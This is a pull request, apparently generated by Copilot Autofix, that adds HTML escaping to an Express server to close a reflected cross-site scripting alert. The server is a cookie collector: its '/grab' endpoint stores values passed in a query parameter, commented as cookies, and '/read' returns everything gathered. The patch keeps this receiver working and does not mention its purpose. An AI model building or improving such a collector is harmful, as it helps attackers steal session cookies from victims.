### PR TITLE
Fix code scanning alert no. 2: Reflected cross-site scripting

### DIFF
--- a/index.js
+++ b/index.js
@@ -1,6 +1,7 @@
 const express = require('express');
 const bodyParser = require('body-parser');
 const cors = require('cors'); // Importar cors
+const escape = require('escape-html');
 
 const app = express();
 let cookiesAlmacenadas = ""; // Variable para almacenar las cookies
@@ -14,12 +15,12 @@ app.get('/', (req, res) => {
 
 app.get('/grab', (req, res) => {
     const data = req.query.data;  // Obtener las cookies
-    cookiesAlmacenadas += " " + data; // Almacenar las cookies
-    res.send(data);
+    cookiesAlmacenadas += " " + escape(data); // Almacenar las cookies
+    res.send(escape(data));
 });
 
 app.get('/read', (req, res) => {
-    res.send(cookiesAlmacenadas); // Enviar las cookies almacenadas
+    res.send(escape(cookiesAlmacenadas)); // Enviar las cookies almacenadas
 });
 
 app.get('/cookies', (req, res) => {

--- a/package.json
+++ b/package.json
@@ -2,6 +2,7 @@
   "dependencies": {
     "cookie-parser": "^1.4.7",
     "cors": "^2.8.5",
-    "express": "^4.21.1"
+    "express": "^4.21.1",
+    "escape-html": "^1.0.3"
   }
 }


### PR DESCRIPTION
Fixes [https://github.com/camachoo18/testNode/security/code-scanning/2](https://github.com/camachoo18/testNode/security/code-scanning/2)

To fix the reflected cross-site scripting vulnerability, we need to sanitize the user input before incorporating it into the HTTP response. The best way to do this is by using a well-known library like `escape-html` to escape any potentially dangerous characters in the user input.

1. Install the `escape-html` library.
2. Import the `escape-html` library at the top of the file.
3. Use the `escape` function from the `escape-html` library to sanitize the user input before appending it to `cookiesAlmacenadas` and before sending it in the HTTP response.


_Suggested fixes powered by Copilot Autofix. Review carefully before merging._
